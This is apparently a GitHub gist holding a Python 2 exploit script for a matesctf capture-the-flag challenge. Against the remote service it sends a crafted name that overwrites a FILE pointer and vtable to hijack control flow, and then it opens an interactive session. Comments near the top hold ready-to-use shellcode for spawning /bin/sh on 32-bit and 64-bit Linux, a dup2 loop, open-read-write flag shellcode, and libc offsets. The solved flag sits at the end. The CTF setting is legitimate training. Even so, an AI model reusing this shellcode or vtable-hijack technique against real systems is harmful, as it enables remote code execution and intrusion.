@Mipu94
Last active May 30, 2016 07:37
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s  # no effect at module scope; doexploit() below binds its own local `s`
#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt stack/bit + 6
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05
#32 system=0x468f0 ; binsh=0x17dbc5
#64 system=0x46640 ; binsh=0x17ccdb
#binsh64="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
#binsh="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
#sys_dup="\x31\xc9\x6a\x04\x5b\x6a\x3f\x58\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf4"
#######################################################
# DEBUG PEDA
#######################################################
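# PEDA helper files, written to the current working directory on import.
# NOTE: this `struct` string shadows the stdlib module name `struct`; the
# helpers below therefore use the bare `pack`/`unpack` names.
struct = """
"""
with open("peda-debug", "w") as f:
    f.write(struct)
debug = """
bp *0x123
"""
# Module-level `filename` is kept for compatibility; doexploit() rebinds
# its own local `filename`, so this value is never read there.
filename = ""
with open("peda-cmd", "w") as f:
    f.write(debug)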
def p(m):
    """Pack the integer *m* as a 4-byte little-endian unsigned value."""
    le_u32 = "<I"
    return pack(le_u32, m)
def u(m):
    """Unpack the first 4 bytes of *m* as a little-endian unsigned int."""
    (value,) = unpack("<I", m)
    return value
########################################################
# PWN! PWN! PWN!
########################################################
def doexploit():
    """Connect to the challenge service and drive its menu with a crafted name.

    Relies on customlibpwn (sock, recvu, send, telnet). The socket is bound
    to a local ``s`` here -- the module-level ``global s`` does not apply
    inside this function -- so recvu/send/telnet are presumably sharing the
    connection through that library; TODO confirm. Addresses are hard-coded
    for the challenge binary (Python 2 print statements).
    """
    #s=sock("localhost",4000)
    s=sock("lab01.matesctf.org",12345)
    recvu("Your choice :")
    send("1\n")
    ret = 0x80489A6
    # Local binding; shadows the module-level `filename`.
    filename = "flag\x00" + p(ret)
    recvu("What do you want to see :")
    send(filename+"\n")
    recvu("Your choice :")
    send("2\n")
    recvu("Your choice :")
    send("5\n")
    recvu("Leave your name :")
    pfilename = (0x804B080 +5)
    pret1 = pfilename -8  # unused
    pret2 = pfilename -8
    pfile = 0x804B260 #pname
    print "pfile: ", 0x804B260
    pvtable = pfile + 4*20 #0x804b2a8
    print "pvtable: ",pvtable
    pvclose = pvtable + 4*17  # unused
    # `name` is padded with NULs to fixed offsets (see the comments per line).
    name = p(0x8000)+"\x00"*(0x20-4) + p(pfile) # overwrite file pointer
    name = name + (4*18-len(name))*"\x00" + p(pvtable) #overwrite vtable
    #*vtable
    name = name + (4*20-len(name))*"\x00" + p(pret2)*18 #overwrite close in vtable
    send(name+"\n")
    telnet()
    s.close()
doexploit()  # runs at import time too: there is no __main__ guard
#flag: matesctf{1_d0nt_w4nt_y0u_t0_s33_my_f1l3}